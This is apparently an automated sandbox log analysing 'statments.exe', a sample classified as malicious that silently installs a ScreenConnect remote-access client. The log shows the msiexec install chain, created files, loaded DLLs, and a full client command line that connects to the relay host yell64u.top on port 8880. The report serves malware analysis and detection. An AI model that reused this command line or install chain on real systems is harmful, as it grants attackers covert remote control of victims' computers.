                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              Source: statments.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051B2640 CreateProcessAsUserW,8_2_051B2640
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4d36d8.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C18.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C77.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F66.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4d36da.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\mzzeov43.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\mzzeov43.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI3C77.tmpJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_011895791_2_01189579
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_011858371_2_01185837
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F6F001_2_055F6F00
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F9F001_2_055F9F00
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F60C01_2_055F60C0
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F6EF11_2_055F6EF1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_00CFD5888_2_00CFD588
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051B00408_2_051B0040
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A8B70D810_2_00007FFB4A8B70D8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A8B10D710_2_00007FFB4A8B10D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A8B10CF10_2_00007FFB4A8B10CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC5BC110_2_00007FFB4ABC5BC1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC628310_2_00007FFB4ABC6283
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC5DD410_2_00007FFB4ABC5DD4
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC5C6A10_2_00007FFB4ABC5C6A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC680910_2_00007FFB4ABC6809
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4A8F70D811_2_00007FFB4A8F70D8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4A8F10D711_2_00007FFB4A8F10D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4A8F10CF11_2_00007FFB4A8F10CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC0033F11_2_00007FFB4AC0033F
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC0E34311_2_00007FFB4AC0E343
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC0F11211_2_00007FFB4AC0F112
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC06DD311_2_00007FFB4AC06DD3
                              Source: statments.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statments.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statments.exe, 00000001.00000000.1521771269.000000000094F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.000000000094F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1565481069.00000000058FC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1565481069.00000000058FC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs statments.exe
                              Source: statments.exe, 00000001.00000002.1565481069.00000000058FC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs statments.exe
                              Source: statments.exe, 00000001.00000002.1565481069.00000000058FC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1563323029.0000000005240000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1564198398.0000000005440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs statments.exe
                              Source: statments.exe, 00000001.00000002.1564198398.0000000005440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs statments.exe
                              Source: statments.exe, 00000001.00000002.1564198398.0000000005440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1552791044.0000000003DB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1568296454.0000000006980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1568296454.0000000006980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs statments.exe
                              Source: statments.exe, 00000001.00000002.1568296454.0000000006980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs statments.exe
                              Source: statments.exe, 00000001.00000002.1549362191.0000000001230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statments.exe
                              Source: statments.exe, 00000001.00000002.1562962459.0000000005200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenamezlib.dll2 vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenamewixca.dll\ vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statments.exe
                              Source: statments.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.0.statments.exe.4ac3d8.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.statments.exe.5240000.5.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 1.0.statments.exe.4ac3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 1.0.statments.exe.4ac3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 1.0.statments.exe.4ac3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal42.evad.winEXE@17/56@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Users\user\Desktop\statments.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\statments.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\statments.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: statments.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: statments.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\statments.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2F66.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5058640 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: statments.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: statments.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\statments.exeFile read: C:\Users\user\Desktop\statments.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\statments.exe "C:\Users\user\Desktop\statments.exe"
                              Source: C:\Users\user\Desktop\statments.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AB83296B808D1A3E5D9792E4DDFA12DB C
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 28425576B87BE497C2D29F2837F582DA
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E415C9D2D8304B77F88CF36FA73BEA3D E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f60a8250-1d8c-4e56-b41b-ff082dd1b17d" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f69440ce-931d-49a5-a5c7-2a17bc772f20" "System"
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
